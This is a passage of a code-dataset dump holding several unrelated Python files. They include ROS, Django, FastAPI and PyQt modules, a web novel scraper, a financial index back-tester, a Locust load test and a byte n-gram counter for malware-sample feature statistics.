install_uwsgi_config(env_name, generate_uwsgi_config(env_name))\n install_uwsgi_service_ubuntu(env_name, generate_uwsgi_service_ubuntu(env_name))\n install_nginx()\n install_nginx_config(env_name, generate_nginx_config(env_name, hostname))\n copy_server(env_name)\n server_services(env_name, 'restart')\n","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":11130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"76623699","text":"from __future__ import absolute_import\nimport numpy as np\nfrom numpy import *\nimport astropy.units as u\nimport logging #for...you guessed it...logging\nimport os,sys,inspect\n\n\n#from __init__ import phigeo, thetageo\n#from .__init__ import phigeo, thetageo\n\nthetageo=147.43 *u.deg # deg, GRAND ->astropy.units\nphigeo=0.72*u.deg # deg, GRAND ->astropy.units\n\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import cm \n\n\n\ndef trig(path, pos, new_pos, new_p2pE, Zenith, Azimuth, EThres, DISPLAY):\n '''\n Interpolates the signal peak-to-peak electric field \n at new antenna positions read at directory/new_antpos.dat\n \n Parameters:\n path: str\n path of shower event\n pos: numpy array\n x, y, z coordinates of the antennas in the simulation\n new_pos: numpy array\n x, y, z coordinates of the antennas in new layout (at 6 check points)\n new_p2pE: numpy array\n [p2p_Ex, p2p_Ey, p2p_Ez, p2p_total]: peak-to-peak electric fields along x, y, z, and norm at new antenna positions\n Zenith: float\n shower axis zenith\n Azimuth: float\n shower axis azimuth\n Ethres: float\n threshold energy for interpolation\n\n DISPLAY: boolean\n if TRUE: 2D map of peak-to-peak electric field \n at positions of triggered antennas are displayed\n \n Output:\n NT0: int\n number of triggered antennas\n indT0: 2-tuple\n indT0[0]: array of indices of triggered antennas\n\n '''\n\n \n indT0 = np.where(new_p2pE >= EThres) # get triggered antennas\n NT0 = np.size(indT0) # number of triggered antennas\n\n if DISPLAY:\n logging.debug('trig:Plotting...')\n\n ##### Plot 2d figures of total peak amplitude in positions along North-South and East-West \n fig1 = plt.figure(figsize=(10,2), dpi=100, facecolor='w', edgecolor='k')\n ax2=fig1.add_subplot(111)\n name = 'total interpolated'\n plt.title(name)\n ax2.set_xlabel('x (m)')\n ax2.set_ylabel('y (m)')\n col2=ax2.scatter(new_pos[0,:],new_pos[1,:], c=new_p2pE, vmin=np.min(new_p2pE), vmax=np.max(new_p2pE), marker='o', cmap=cm.gnuplot2_r)\n ax2.scatter(new_pos[0,indT0],new_pos[1,indT0], facecolors='none', edgecolors='k')\n plt.xlim((min(pos[0,:]),max(pos[0,:])))\n plt.ylim((min(pos[1,:]),max(pos[1,:])))\n plt.colorbar(col2)\n plt.tight_layout()\n\n\n plt.show(block=False)\n\n\n return NT0, indT0\n","sub_path":"grid_shape/trigger.py","file_name":"trigger.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"491003782","text":"#!/usr/bin/env python3 \nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport rospy\nfrom master_msgs.msg import traction_Orders,rpm\nimport time\n\n#counter = 0\nrpm_present = rpm()\ntraction_present = traction_Orders()\n\ntime_rpm = []\nrpm_plot = []\n\ntime_order = []\norder_plot = []\nstart = 0.0\n#state = 0\n\ndef callback_rpm(param):\n\tglobal time_rpm,rpm_plot,start\n\ttime_rpm.append(round(time.time()-start,4))\n\trpm_plot.append(param.R0_V)\n\t#print(param)\n\t\ndef callback_traction(param):\n global 
time_order,order_plot\n time_order.append(round(time.time()-start,4))\n order_plot.append(param.rpm_l) \n\ndef guardar():\n global time_rpm,rpm_plot\n global time_order,order_plot\n #array = np.array([time,rpm_plot])\n print(time_rpm)\n print(rpm_plot)\n print(' ')\n print(time_order)\n print(order_plot)\n\ndef node_rpm_plot():\n global rpm_present,traction_present\n global time_rpm,rpm_plot\n global start\n rospy.init_node(\"plotter_rpm\")\n rospy.Subscriber('topic_traction_orders',traction_Orders,callback_traction)\n rospy.Subscriber('topic_rpm',rpm,callback_rpm)\n pub_traction = rospy.Publisher('topic_traction_orders',traction_Orders,queue_size=10)\n rate = rospy.Rate (10)\n start = time.time()\n a = 1\n state = 0\n rpm_act = 0\n traction_present.rpm_r = rpm_act\n traction_present.rpm_l = rpm_act\n pub_traction.publish(traction_present)\n while not rospy.is_shutdown():\n te = round(time.time()-start,4)\n if a==1:\n if state==0:\n rpm_act = 0\n if te > 5:\n print(te)\n state = 1\n if state==1:\n rpm_act = 50\n if te > 10:\n print(te)\n state = 2\n elif state==2:\n rpm_act = 100\n if te > 15:\n print(te)\n state = 3\n elif state==3:\n rpm_act = 150\n if te > 20:\n print(te)\n state = 4\n elif state==4:\n rpm_act = 200\n if te > 25:\n print(te)\n state = 5\n elif state==5:\n rpm_act = 255\n if te > 30:\n print(te)\n state = 6\n elif state==6:\n rpm_act = 200\n if te > 35:\n print(te)\n state = 7\n elif state==7:\n rpm_act = 150\n if te > 40:\n print(te)\n state = 8\n elif state==8:\n rpm_act = 100\n if te > 45:\n print(te)\n state = 9\n elif state==9:\n rpm_act = 50\n if te > 50:\n print(te)\n state = 10\n elif state==10:\n rpm_act = 0\n if te > 55:\n print(te)\n state = 11\n elif state==11:\n if te>60:\n a = 0\n elif a==0:\n guardar()\n break\n traction_present.rpm_r = rpm_act\n traction_present.rpm_l = rpm_act\n pub_traction.publish(traction_present)\n rate.sleep ()\n # a = input('stop = ')\n # if int(a)==1:\n # traction_present.rpm_l = 0\n # traction_present.rpm_r = 0\n # pub_traction.publish(traction_present)\n # guardar()\n # else:\n # traction_present.rpm_l = 0\n # traction_present.rpm_r = 0\n # pub_traction.publish(traction_present)\n\nif __name__ == '__main__':\n try:\n node_rpm_plot()\n except rospy.ROSInterruptException:\n pass\n","sub_path":"scripts/node_pid_plot_rpm.py","file_name":"node_pid_plot_rpm.py","file_ext":"py","file_size_in_byte":3870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"535218503","text":"# -*- coding: utf-8 -*-\n\nimport requests\nfrom urllib.parse import urljoin\n\nfrom bs4 import BeautifulSoup\nfrom pymongo import MongoClient\n\n\nclient = MongoClient()\ncollection = client.spider.novel\n\nstart_url = 'http://www.shuquge.com/txt/848/545887.html'\n\nname = '我要做皇帝'\nauthor = '要离刺荆轲'\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'\n}\n\n\ndef crawl(start_url):\n page_url = start_url\n count = 0\n\n while count < 5000:\n count += 1\n resp = requests.get(page_url)\n soup = BeautifulSoup(resp.content, 'lxml')\n\n try:\n chapter = soup.find('div', class_='content')\n title = chapter.find('h1').get_text()\n content = chapter.find(id='content').get_text()\n\n # 从全局找一下,比从局部找容错率高\n next_page = soup.find('a', text='下一章').get('href')\n next_page_url = urljoin(start_url, next_page)\n\n data = {\n 'name': name,\n 'author': author,\n 'count': count,\n 'title': title,\n 'content': 
'\\n'.join(content.split()),\n 'url': page_url,\n 'next_page_url': next_page_url,\n }\n collection.insert(data)\n page_url = next_page_url\n\n except AttributeError as e:\n print(count, page_url)\n break\n\n\ndef fix():\n for doc in collection.find({'content': ''}):\n print(doc['url'])\n resp = requests.get(doc['url'])\n soup = BeautifulSoup(resp.content, 'lxml')\n content = soup.find(id='content').get_text()\n doc.update(content=content)\n collection.replace_one({'_id': doc['_id']}, doc)\n\n # 第一次缺少书名和作者名作为index,添加上\n # collection.update_many({}, {'$set': {'name': '我要做皇帝', 'author': '要离刺荆轲'}})\n # collection.create_index({'name': 1, 'author': 1})\n\n\ndef make_txt(name):\n file_name = name + '.txt'\n with open(file_name, 'w') as f:\n f.write(file_name + '\\n')\n # 找出全部,按count排序\n for doc in collection.find({'name': name}).sort('count'):\n f.write('\\n\\n' + doc['title'] + '\\n\\n')\n f.write(doc['content'])\n\n\nif __name__ == '__main__':\n make_txt('我要做皇帝')","sub_path":"spider/novel.py","file_name":"novel.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"116990748","text":"input = 34000000\n\nimport primes\nimport itertools\nimport math\n\ndef all_combinations(any_list):\n return itertools.chain.from_iterable(itertools.combinations(any_list, i + 1) for i in range(len(any_list)))\n\ndef even_divisors(n):\n pf = primes.factors(n)\n p = all_combinations(pf)\n f = list(set([math.prod(x) for x in p]))\n\n return f\n\ndef num_presents(house):\n divisors = [1] + even_divisors(house)\n\n elf_numbers = list(filter(lambda x: x * 50 >= house, divisors))\n\n return sum(elf_numbers) * 11\n\nfor i in itertools.count():\n if num_presents(i) > input: break\n\nprint(i)\n","sub_path":"AdventOfCode/2015/day20.py","file_name":"day20.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"190409257","text":"import cv2\n\nface_cascade = cv2.CascadeClassifier('venv/lib/python3.8/site-packages/cv2/data/haarcascade_frontalface_default.xml')\nimg = cv2.imread('resources/lena.png')\nimg_gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\nfaces = face_cascade.detectMultiScale(img_gray,1.3,3)\n\nfor (x,y,w,h) in faces:\n cv2.rectangle(img,(x,y),(x+w,y+h),(0,255,0), 3)\n\ncv2.imshow(\"out\", img)\ncv2.waitKey(0)\n","sub_path":"openCV/face-detect.py","file_name":"face-detect.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"304154488","text":"import os\r\nN = 4\r\nHEX = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"a\", \"b\", \"c\", \"d\", \"e\", \"f\"]\r\nLABEL = {\"PUA\":0, \"SoftwareBundler\":1, \"Torjan\":2, \"PWS\":3, \"TrojanDownloader\":4, \"VirTool\":5, \"BackDoor\":6, \"Misleading\":7, \"BrowserModifier\":8, \"TorjanSpy\":9, \"Ransom\":10, \"Program\":11, \"Hacktool\":12, \"DDoS\":13, \"Virus\":14}\r\ncount_statistics = {}\r\n#paths = {\"./VirusShare_00dee9ce6cbd5e0997cf703825a32d76\", \"./VirusShare_0a0a82c14074b691069a603c066c22f6\", \"./VirusShare_0b4dff474876dc48f6e23841709ce3cb\"}\r\npaths = os.listdir(\"./\")\r\ncount = 0;\r\nfor path in paths:\r\n count = count + 1\r\n path = path.rstrip()\r\n file = open(path, \"rb\")\r\n for line in file:\r\n tl = str(line).rstrip().split(\"\\\\x\")[1:]\r\n tl = [element for element in tl if (len(element) == 2) and (element[0] in HEX) and (element[1] in 
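# day20.py above counts presents as 11 * (sum of divisors d of house with
# d * 50 >= house, i.e. each elf only delivers to its first 50 houses). A
# brute-force O(sqrt(n)) reference for the same quantity, handy for
# cross-checking the prime-factor version (the helper name is ours):
def num_presents_ref(house):
    total = 0
    d = 1
    while d * d <= house:
        if house % d == 0:
            for div in {d, house // d}:   # both members of the divisor pair
                if div * 50 >= house:     # elf number div still delivers here
                    total += div
        d += 1
    return total * 11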
HEX)]\r\n        for i in range(len(tl) - (N - 1)):\r\n            txt = \"\".join(tl[i:i + N])\r\n            if (not (txt[0:2] == txt[2:4] and txt[2:4] == txt[4:6] and txt[4:6] == txt[6:8])):\r\n                if (count_statistics.get(txt) is None):\r\n                    count_statistics[txt] = 1\r\n                else:\r\n                    count_statistics[txt] = count_statistics[txt] + 1\r\n    count_statistics = dict((key, value) for key, value in count_statistics.items() if value > 2)\r\n    file.close()\r\n    print(\"%i, %i\" % (count, len(count_statistics)))\r\n\r\nop = open(\"grams.txt\", \"w\")\r\nprint(len(count_statistics))\r\nsorted_grams = sorted(count_statistics.items(), key=lambda x: x[1], reverse = True)\r\nfor i in range(100000):\r\n    op.write(str(sorted_grams[5000 + i]))  # items are (gram, count) tuples; write() needs a str\r\n    op.write(\"\\n\")\r\nop.close()\r\n","sub_path":"N-gram-statistics.py","file_name":"N-gram-statistics.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"115741002","text":"from math import floor\nfrom datetime import date, datetime\nfrom lxml import etree\n\ntry:\n    from django.utils import timezone\nexcept ImportError:\n    timezone = None\n\nfrom ..settings import FREQS, CONFIG\nfrom ..utils import assert_, force_text, get_current_domain, INT_TYPES\n\n\nclass Formatter(object):\n    def __init__(self, builder):\n        self.builder = builder\n\n    @classmethod\n    def format_bool(cls, value):\n        return 'yes' if value else 'no'\n\n    @staticmethod\n    def format_comma_sep(value):\n        if isinstance(value, (list, tuple)):\n            return ', '.join([force_text(val) for val in value])\n        return value\n\n    @staticmethod\n    def format_date(value):\n        if isinstance(value, datetime):\n            value = value.date()\n        if isinstance(value, date):\n            return value.strftime('%Y-%m-%d')\n        return value\n\n    @classmethod\n    def format_datetime(cls, value):\n        if isinstance(value, datetime):\n            if timezone:\n                value = value.replace(tzinfo=timezone.get_current_timezone())\n            return value.isoformat()\n        return cls.format_date(value)\n\n    @staticmethod\n    def priority(value):\n        if isinstance(value, INT_TYPES):\n            value = floor(value * 10) / 10\n        assert_(1. 
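# The manual get()/increment bookkeeping in N-gram-statistics.py above is what
# collections.Counter provides out of the box; a hedged restatement of the hot
# loop (same skip rule for grams made of one repeated byte):
from collections import Counter

def count_ngrams(hex_bytes, n=4):
    # hex_bytes: list of two-character hex strings, e.g. ['4d', '5a', '90', ...]
    counts = Counter()
    for i in range(len(hex_bytes) - (n - 1)):
        gram = "".join(hex_bytes[i:i + n])
        if not (gram[0:2] == gram[2:4] == gram[4:6] == gram[6:8]):
            counts[gram] += 1
    return counts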
>= value >= 0., 'Priority %r invalid, must be between 0 and 1', value)\n        return str(value)\n\n    @classmethod\n    def lastmod(cls, value):\n        if isinstance(value, datetime):\n            return cls.format_datetime(value)\n        if isinstance(value, date):\n            return cls.format_date(value)\n\n    @staticmethod\n    def changefreq(value):\n        assert_(value in FREQS, 'Change frequency \"%s\" invalid, must be one of %s', value, ','.join(FREQS))\n        return value\n\n\nclass Abstract(object):\n    root_element = 'urlset'\n    formatter_class = Formatter\n    nsmap = {\n        None: 'http://www.sitemaps.org/schemas/sitemap/0.9'\n    }\n\n    def __init__(self, view, object_list):\n        self.view = view\n        self.object_list = object_list\n        self.domain = get_current_domain(view.request)\n        self.protocol = 'https' if view.request.is_secure() else 'http'\n        self.formatter = self.formatter_class(self)\n\n    def full_url(self, absolute_url):\n        return '%s://%s%s' % (self.protocol, self.domain, absolute_url)\n\n    def _get(self, name, obj, default=None):\n        try:\n            attr = getattr(self.view, name)\n        except AttributeError:\n            return default\n        if callable(attr):\n            return attr(obj)\n        return attr\n\n    def ns_format(self, tag, ns=None):\n        return '{%s}%s' % (self.nsmap[ns], tag)\n\n    def render(self):\n        conf = CONFIG()\n        self.root = etree.Element(self.ns_format(self.root_element), nsmap=self.nsmap)\n        count = 0\n        for obj in self.object_list:\n            count += len(etree.tostring(self.render_obj(obj), encoding='UTF-8'))\n            if count > conf['MAX_SIZE']:\n                assert_(False, 'Maximum size of %s exceeded', conf['MAX_SIZE'])\n                break\n        return etree.tostring(self.root, pretty_print=conf['PRETTY'],\n                              xml_declaration=True, encoding='UTF-8')\n","sub_path":"sitemapext/builder/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"221277622","text":"#!/usr/bin/env python3\n\nfrom fastapi import Path, Body\nfrom pydantic import BaseModel, Field\nfrom typing import List\n\nclass Dname:\n    STR = \"The display name of the photographer\"\n    MAX_LENGTH = 16\n    PATH_PARAM = Path(..., title = STR, max_length = MAX_LENGTH)\n\nclass Fname:\n    STR = \"The first name of the photographer\"\n    MAX_LENGTH = 32\n\nclass Lname:\n    STR = \"The last name of the photographer\"\n    MAX_LENGTH = 32\n\nclass Interests:\n    STR = \"The interests of the photographer\"\n\nclass Photographer(BaseModel):\n    display_name: str = Field (None, title = Dname.STR, max_length = Dname.MAX_LENGTH)\n    first_name: str = Field (None, title = Fname.STR, max_length = Fname.MAX_LENGTH)\n    last_name: str = Field (None, title = Lname.STR, max_length = Lname.MAX_LENGTH)\n    interests: List[str] = Field (None, title = Interests.STR)\n\nPHOTOGRAPHER_EXAMPLE = {\n    \"display_name\": \"rdoisneau\",\n    \"first_name\": \"robert\",\n    \"last_name\": \"doisneau\",\n    \"interests\": [\"street\", \"portrait\"],\n    }\n\nPHOTOGRAPHER_BODY = Body(..., example = PHOTOGRAPHER_EXAMPLE)\n\nclass PhotographerDigest(BaseModel):\n    display_name: str\n    link: str\n\nclass Photographers(BaseModel):\n    items: List[PhotographerDigest]\n    has_more: bool\n","sub_path":"app/photographer-service/photographer_const.py","file_name":"photographer_const.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"557427578","text":"import pandas as pd\nfrom pandas.tseries.offsets import BDay\nimport numpy as np\nfrom datetime import date, datetime\nimport logging\n\n# my own modules\nfrom 
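# photographer_const.py above only declares the models and parameter metadata;
# a hedged sketch of how a route module might consume them (the endpoint path
# and function name are illustrative, and Dname, Photographer and
# PHOTOGRAPHER_BODY are assumed imported from photographer_const):
from fastapi import FastAPI

app = FastAPI()

@app.put("/photographers/{display_name}")
def upsert_photographer(display_name: str = Dname.PATH_PARAM,
                        photographer: Photographer = PHOTOGRAPHER_BODY):
    # the Path() length limit and the documented example body both come from the constants
    return {"display_name": display_name, "stored": photographer.dict()}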
financial_database import FinancialDatabase\nfrom config_database import my_database_name\nfrom index_signal import Signal\nfrom index_weight import _Weight\nfrom finance_tools import index_calculation\nfrom dataframe_tools import select_rows_from_dataframe_based_on_sub_calendar\n\n# Logger\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\nformatter = logging.Formatter('%(asctime)s : %(module)s : %(funcName)s : %(message)s')\nstream_handler = logging.StreamHandler()\nstream_handler.setFormatter(formatter)\nlogger.addHandler(stream_handler)\n\n\nclass Basket:\n \"\"\"Class definition of Basket\"\"\"\n\n def __init__(self, tickers: {str, list}, currency: str = None, total_return: bool = False, dividend_tax: float = 0.0):\n self.tickers = tickers\n self.currency = currency\n self.total_return = total_return\n self.dividend_tax = dividend_tax\n\n def basket_prices(self, start_date: {date, datetime}=None, end_date: {date, datetime}=None):\n financial_database_handler = FinancialDatabase(my_database_name, False)\n if self.total_return:\n return financial_database_handler.get_total_return_df(self.tickers, start_date, end_date, self.dividend_tax,\n self.currency)\n else:\n return financial_database_handler.get_close_price_df(self.tickers, start_date, end_date, self.currency)\n\n # ------------------------------------------------------------------------------------------------------------------\n # getter and setter methods\n\n @property\n def dividend_tax(self):\n return self._dividend_tax\n\n @dividend_tax.setter\n def dividend_tax(self, dividend_tax: float):\n if dividend_tax >= 0:\n self._dividend_tax = dividend_tax\n else:\n raise ValueError('dividend_tax needs to be greater or equal to zero.')\n\n def __repr__(self):\n return \"\"\\\n .format(len(self.tickers), currency=self.currency if self.currency else 'local',\n total_return='total return' if self.total_return else 'price return',\n dividend_tax=' with ' + str(round(self.dividend_tax*100, 2)) + '% dividend tax' if self.dividend_tax and self.total_return else '')\n\n\nclass Index(Basket):\n \"\"\"Class definition of Index. 
Subclass of Basket class.\"\"\"\n\n    def __init__(self, tickers: {str, list}, rebalancing_calendar: pd.DatetimeIndex, index_fee: float = 0.0,\n                 transaction_cost: float = 0.0, currency: str = None, total_return: bool = False,\n                 dividend_tax: float = 0.0, initial_amount: float = 100.0):\n        super().__init__(tickers, currency, total_return, dividend_tax)\n        self.rebalancing_calendar = rebalancing_calendar\n        self.index_fee = index_fee\n        self.transaction_cost = transaction_cost\n        self.initial_amount = initial_amount\n        self._signal = None\n        self._weight = None\n\n    def _check_before_back_test(self):\n        if self.signal is None:\n            self.signal = Signal(ticker_list=self.tickers)  # default signal\n        if self.weight is None:\n            raise ValueError('No weight assigned.')\n\n    def get_back_test(self, end_date: {date, datetime}=None, return_index_only: bool = True):\n        back_test = self._get_back_test_or_weight_df(True, end_date)\n        if return_index_only:\n            return back_test[['index']]\n        return back_test\n\n    def get_weight_df(self, end_date: {date, datetime}=None):\n        return self._get_back_test_or_weight_df(False, end_date)  # False -> return the weights, not the back test\n\n    def _get_back_test_or_weight_df(self, get_back_test: bool, end_date: {date, datetime}=None):\n        # handle the start and end date\n        start_date = self.rebalancing_calendar[0] - BDay(5)\n        if end_date is not None and np.datetime64(end_date) <= np.datetime64(self.rebalancing_calendar[0]):\n            raise ValueError(\"end_date is not allowed to be before the rebalancing calendar.\")\n\n        # retrieve the underlying price to be used in the index\n        underlying_price_df = self.basket_prices(start_date, end_date)\n        self._check_before_back_test()\n\n        # adjust rebalance calendar by moving one business day ahead in the underlying price calendar\n        rebalancing_calendar = self.adjust_rebalance_calendar(self.rebalancing_calendar, underlying_price_df.index)\n\n        # calculate the signal and if there is no observation calendar assigned to the signal assign a default one\n        if self.signal.signal_observation_calendar is None:\n            self.signal.signal_observation_calendar = underlying_price_df.index\n        signal_df = self.signal.get_signal_df()\n\n        # calculate the weights\n        self.weight.signal_df = signal_df\n        weight_df = self.weight.get_weights()\n        weight_df = select_rows_from_dataframe_based_on_sub_calendar(weight_df, rebalancing_calendar)\n\n        if get_back_test:\n            return index_calculation(underlying_price_df, weight_df, self.transaction_cost, self.index_fee,\n                                     self.initial_amount)\n        else:\n            return weight_df\n\n    # ------------------------------------------------------------------------------------------------------------------\n    # getter and setter and static methods\n    @staticmethod\n    def adjust_rebalance_calendar(rebalance_calendar: pd.DatetimeIndex, daily_calendar: pd.DatetimeIndex) \\\n            -> pd.DatetimeIndex:\n        \"\"\"Assumes that rebalance_calendar and daily_calendar are of type DatetimeIndex. If a rebalance date does not\n        exist in daily_calendar, pick the following day. 
Returns a DatetimeIndex.\"\"\"\n date_is_in_cal = np.array(np.in1d(np.array(rebalance_calendar.values, dtype='datetime64[D]'),\n np.array(daily_calendar.values, dtype='datetime64[D]')))\n adjusted_date_list = []\n for i in range(date_is_in_cal.size):\n if date_is_in_cal[i]:\n adjusted_date_list.append(rebalance_calendar[i])\n else:\n # find the following day to be the rebalance date if it does not exist in the daily calendar\n adjusted_date_list.append(\n max(daily_calendar,\n key=lambda x: min((x - rebalance_calendar[i]).days, 0))\n )\n return pd.DatetimeIndex(adjusted_date_list)\n\n @property\n def signal(self):\n return self._signal\n\n @signal.setter\n def signal(self, signal):\n if issubclass(type(signal), Signal) or isinstance(signal, Signal):\n self._signal = signal\n else:\n raise ValueError('Needs to be an object from Signal class or a subclass of class Signal.')\n\n @property\n def weight(self):\n return self._weight\n\n @weight.setter\n def weight(self, weight):\n if issubclass(type(weight), _Weight):\n self._weight = weight\n else:\n raise ValueError('Needs to be an object from a subclass of class _Weight.')\n\n @property\n def rebalancing_calendar(self):\n return self._rebalancing_calendar\n\n @rebalancing_calendar.setter\n def rebalancing_calendar(self, rebalancing_calendar: pd.DatetimeIndex):\n if rebalancing_calendar.is_monotonic_increasing:\n self._rebalancing_calendar = rebalancing_calendar\n else:\n raise ValueError('rebalancing_calendar needs to be monotonic increasing (oldest to newest date).')\n\n @property\n def index_fee(self):\n return self._index_fee\n\n @index_fee.setter\n def index_fee(self, index_fee: float):\n self._index_fee = index_fee\n if index_fee < 0:\n logger.warning('index_fee is negative.')\n\n @property\n def transaction_cost(self):\n return self._transaction_cost\n\n @transaction_cost.setter\n def transaction_cost(self, transaction_cost: float):\n if transaction_cost >= 0:\n self._transaction_cost = transaction_cost\n else:\n raise ValueError('transaction_cost needs to be greater or equal to zero.')\n\n @property\n def initial_amount(self):\n return self._initial_amount\n\n @initial_amount.setter\n def initial_amount(self, initial_amount: float):\n if initial_amount > 0:\n self._initial_amount = initial_amount\n else:\n raise ValueError('initial_amount needs to be greater than zero.')\n\n\n","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":8663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"12497251","text":"from locust import HttpLocust, TaskSet, task\nimport json\n\nclass UserBehavior(TaskSet):\n def on_start(self):\n self.client.get(\"/\")\n\n @task(2) \n def credits(self):\n self.client.get(\"/credits/\")\n\n @task(3)\n def credit(self):\n self.client.get(\"/credits/1\")\n\n @task(4)\n def create_credit(self):\n headers = {'content-type': 'application/json',\n 'Accept-Encoding': 'gzip'}\n self.client.post(\"/credits/\", data=json.dumps({\n \"title\": \"changed11\", \"rateOfInterest\": 62, \"description\": \"some\"\n }),\n headers=headers,\n name=\"Create a new credit\")\n\n @task(5)\n def update_credit(self):\n headers = {'content-type': 'application/json',\n 'Accept-Encoding': 'gzip'}\n self.client.put(\"/update/1\", data=json.dumps({\n \"title\": \"credit12\", \"rateOfInterest\": 32, \"description\": \"none\"\n }),\n headers=headers,\n name=\"Update a credit\")\n\n @task(6)\n def delete(self):\n self.client.delete('/delete/2')\n\nclass 
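# adjust_rebalance_calendar() above snaps each rebalance date to the first
# available trading day on or after it. A hedged pandas equivalent with the
# same effect (assumes both indexes are sorted and every rebalance date falls
# within the daily calendar's range):
import pandas as pd

def snap_to_calendar(rebal: pd.DatetimeIndex, daily: pd.DatetimeIndex) -> pd.DatetimeIndex:
    return daily[daily.searchsorted(rebal)]  # first daily date >= each rebalance date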
WebsiteUser(HttpLocust):\n task_set = UserBehavior\n wait_time = 3000\n","sub_path":"locust_tests/locust.py","file_name":"locust.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"22696159","text":"\n\nfrom xai.brain.wordbase.nouns._stripe import _STRIPE\n\n#calss header\nclass _STRIPES(_STRIPE, ):\n\tdef __init__(self,): \n\t\t_STRIPE.__init__(self)\n\t\tself.name = \"STRIPES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"stripe\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_stripes.py","file_name":"_stripes.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"150971862","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('members', '0001_initial'),\n ('events', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='EventPerson',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, verbose_name='ID', auto_created=True)),\n ('type', models.CharField(default='S', max_length=1, choices=[('T', 'Teacher'), ('S', 'Student'), ('D', 'DJ'), ('G', 'Guest')])),\n ('event', models.ForeignKey(related_name='person', to='events.Event')),\n ('person', models.ForeignKey(related_name='event', to='members.Person')),\n ],\n ),\n migrations.AddField(\n model_name='event',\n name='people',\n field=models.ManyToManyField(related_name='events', to='members.Person', through='events.EventPerson'),\n ),\n ]\n","sub_path":"api/events/migrations/0002_auto_20151005_2145.py","file_name":"0002_auto_20151005_2145.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"324697552","text":"# -*- coding: Utf-8 -*-\nimport base64\nimport pickle\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\nfrom common_blocks.PRZ.static.GVARS import GV, warning\n\nfrom common_blocks.PRZ.forms.training_script_ui import Ui_FormTrainingScript\nfrom common_blocks.PRZ.prz_modules.training_script_package.tree_widget_item import TreeWidgetItem\nfrom common_blocks.PRZ.prz_modules.training_script_package.task_link import TaskLink\nfrom common_blocks.PRZ.prz_modules.training_script_package.save_script import wdg_save_script\nfrom common_blocks.PRZ.prz_modules.training_script_package.script_track import ScriptTrack\nfrom common_blocks.PRZ.prz_modules.training_script_package.recorded_scripts import recorded_scripts\n\n\n\nclass TrainingScript(QtWidgets.QWidget):\n\n signalOperDateChanged = QtCore.pyqtSignal(QtCore.QDateTime)\n\n def __init__(self):\n QtWidgets.QWidget.__init__(self)\n\n self.__tune_ui()\n self.__create_connects()\n\n def __tune_ui(self):\n self.ui = Ui_FormTrainingScript()\n self.ui.setupUi(self)\n\n self.script_track = ScriptTrack()\n self.script_track.setParent(self.ui.script_widget_content)\n self.ui.script_widget_content.resize(self.script_track.size())\n self.ui.date_current.setDate(QtCore.QDate.currentDate())\n self.ui.date_current.setTime(QtCore.QTime.currentTime())\n self.ui.date_oper.setDate(QtCore.QDate.currentDate())\n self.ui.date_oper.setTime(QtCore.QTime.currentTime())\n self.__date_timer = QtCore.QTimer()\n self.__date_timer.start(1000)\n\n GV.orders_log.set_text_edit(self.ui.te_orders)\n\n def __create_connects(self):\n 
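# Because the migration above routes Event.people through EventPerson,
# memberships must be created on the through model rather than via
# event.people.add(). A hedged usage sketch (the import path follows the app
# label used in the migration):
from events.models import EventPerson

def add_teacher(event, person):
    # 'T' is the 'Teacher' choice declared on EventPerson.type
    return EventPerson.objects.create(event=event, person=person, type='T')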
